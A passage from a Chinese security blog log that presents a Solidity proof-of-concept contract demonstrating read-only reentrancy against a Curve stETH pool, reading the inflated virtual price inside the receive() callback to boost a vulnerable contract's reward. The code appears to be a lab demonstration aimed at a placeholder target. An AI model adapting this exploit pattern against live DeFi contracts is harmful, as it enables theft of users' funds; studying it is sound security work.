最终的攻击合约如下：

contract ExploitContract {
    ICurve private constant pool = ICurve(STETH_POOL);
    IERC20 public constant lpToken = IERC20(LP_TOKEN);
    VulnContract private immutable target;

    constructor(address _target) {
        target = VulnContract(_target);
    }

    // Stake LP into VulnContract
    function stakeTokens() external payable {
        uint[2] memory amounts = [msg.value, 0];
        uint lp = pool.add_liquidity{value: msg.value}(amounts, 1);
        console.log(
            "LP token price after staking into VulnContract",
            pool.get_virtual_price()
        );

        lpToken.approve(address(target), lp);
        target.stake(lp);
    }

    // Perform Read-Only Reentrancy
    function performReadOnlyReentrnacy() external payable {
        // Add liquidity to Curve
        uint[2] memory amounts = [msg.value, 0];
        uint lp = pool.add_liquidity{value: msg.value}(amounts, 1);
        // Log get_virtual_price
        console.log(
            "LP token price before remove_liquidity()",
            pool.get_virtual_price()
        );
        // Remove liquidity from Curve
        // remove_liquidity() invokes the recieve() callback
        uint[2] memory min_amounts = [uint(0), uint(0)];
        pool.remove_liquidity(lp, min_amounts);
        // Log get_virtual_price
        console.log(
            "--------------------------------------------------------------------"
        );
        console.log(
            "LP token price after remove_liquidity()",
            pool.get_virtual_price()
        );

        // Attack - Log reward amount
        uint reward = target.getReward();
        console.log("Reward if Read-Only Reentrancy is not invoked: ", reward);
    }

    receive() external payable {
        // receive() is called when the remove_liquidity is called
        console.log(
            "--------------------------------------------------------------------"
        );
        console.log(
            "LP token price during remove_liquidity()",
            pool.get_virtual_price()
        );
        // Attack - Log reward amount
        uint reward = target.getReward();
        console.log("Reward if Read-Only Reentrancy is invoked: ", reward);
    }
}

还是那句话：Don’t trust anyone

2025.8.13

这几天没啥时间，随便水点东西得了

本文作者： 9C±Void
本文链接： https://cauliweak9.github.io/2025/08/04/DailyCheckin/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！